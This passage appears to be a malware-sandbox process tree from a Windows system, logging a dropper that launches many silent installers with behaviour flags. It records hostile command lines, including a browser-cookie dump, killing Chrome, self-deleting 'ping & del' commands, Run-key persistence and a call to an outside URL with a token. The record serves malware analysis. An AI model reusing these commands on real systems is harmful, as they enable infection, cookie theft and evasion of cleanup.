                                                                                                                                                                                                                                                PID:4332
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                PID:8920
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xwoy5qqp.xw5\askinstall31.exe & exit
                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                            PID:8456
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\xwoy5qqp.xw5\askinstall31.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\xwoy5qqp.xw5\askinstall31.exe
                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                PID:9044
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itz5xcb3.lkf\toolspab1.exe & exit
                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                PID:9016
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\itz5xcb3.lkf\toolspab1.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\itz5xcb3.lkf\toolspab1.exe
                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:8532
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\itz5xcb3.lkf\toolspab1.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\itz5xcb3.lkf\toolspab1.exe
                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                      PID:8380
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\53ajrl4x.dkc\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                    PID:8232
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\rcp3rjihd11\tnrbfrdht3z.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\rcp3rjihd11\tnrbfrdht3z.exe" /ustwo INSTALL
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                      PID:5372
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 648
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                        PID:5940
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 664
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                        PID:2280
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 764
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:4760
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 792
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:6416
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 880
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:6756
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 952
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:4208
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1184
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:4152
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1144
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:6680
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1284
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:6224
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 1276
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                        PID:6908
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\avbfq1toq2v\KiffApp1.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\avbfq1toq2v\KiffApp1.exe"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5468
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\aerwl3im20s\4eub4ry3wcd.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\aerwl3im20s\4eub4ry3wcd.exe"
                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:5528
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\aerwl3im20s\4eub4ry3wcd.exe"
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:5896
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                            PID:2240
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\g10zgsgl4t0\app.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\g10zgsgl4t0\app.exe" /8-23
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:5672
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\g10zgsgl4t0\app.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\g10zgsgl4t0\app.exe" /8-23
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:7064
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4e55w5yujyw\vpn.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4e55w5yujyw\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                          PID:5692
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-GDN6U.tmp\vpn.tmp
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-GDN6U.tmp\vpn.tmp" /SL5="$5034A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4e55w5yujyw\vpn.exe" /silent /subid=482
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                            PID:5800
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:6100
                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                  tapinstall.exe remove tap0901
                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                    PID:5680
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:6092
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                      tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                      PID:6328
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:4716
                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:8840
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bg2oys3z22w\IBInstaller_97039.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bg2oys3z22w\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                PID:5812
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-RVJHL.tmp\IBInstaller_97039.tmp
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-RVJHL.tmp\IBInstaller_97039.tmp" /SL5="$4020E,9979514,721408,C:\Users\Admin\AppData\Local\Temp\bg2oys3z22w\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:5924
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:6128
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-A1IK6.tmp\{app}\vdi_compiler.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-A1IK6.tmp\{app}\vdi_compiler"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      PID:5148
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\fa4ugss4vou\gy2vw21resq.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\fa4ugss4vou\gy2vw21resq.exe" /quiet SILENT=1 AF=756
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                  PID:5972
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\fa4ugss4vou\gy2vw21resq.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\fa4ugss4vou\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617773656 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                      PID:5504
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1ne3ysh1iid\setup_10.2_us3.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\1ne3ysh1iid\setup_10.2_us3.exe" /silent
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:8848
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3G34E5C6QJ\setups.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\3G34E5C6QJ\setups.exe" ll
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                PID:852
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-PK4H3.tmp\setups.tmp
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-PK4H3.tmp\setups.tmp" /SL5="$401C6,1873631,71168,C:\Users\Admin\AppData\Local\Temp\3G34E5C6QJ\setups.exe" ll
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                  PID:2216
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                              PID:2784
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                PID:3784
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                  PID:4240
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:4144
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:4952
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      PID:2288
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:4344
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:5016
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                          ping 127.0.0.1
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Runs ping.exe
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4144
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                      PID:4308
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                      PID:5672
                                                                                                                                                                                                                                                      • C:\ProgramData\959778.exe
                                                                                                                                                                                                                                                        "C:\ProgramData\959778.exe"
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                          PID:7664
                                                                                                                                                                                                                                                        • C:\ProgramData\6413703.exe
                                                                                                                                                                                                                                                          "C:\ProgramData\6413703.exe"
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                          PID:7756
                                                                                                                                                                                                                                                          • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                            "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:7460
                                                                                                                                                                                                                                                          • C:\ProgramData\2058517.exe
                                                                                                                                                                                                                                                            "C:\ProgramData\2058517.exe"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:7960
                                                                                                                                                                                                                                                              • C:\ProgramData\2058517.exe
                                                                                                                                                                                                                                                                "{path}"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:5844
                                                                                                                                                                                                                                                              • C:\ProgramData\5256267.exe
                                                                                                                                                                                                                                                                "C:\ProgramData\5256267.exe"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:8060
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:6084
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:5748
                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:1840
                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                  PID:3904
                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                    PID:4376
                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:1340
                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:1168
                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:1040
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\rgbeugt
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\rgbeugt
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:4472
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:8572
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:2024
                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:60
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                  PID:4892
                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  PID:5084
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                  PID:5000
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:3912
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:5768
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
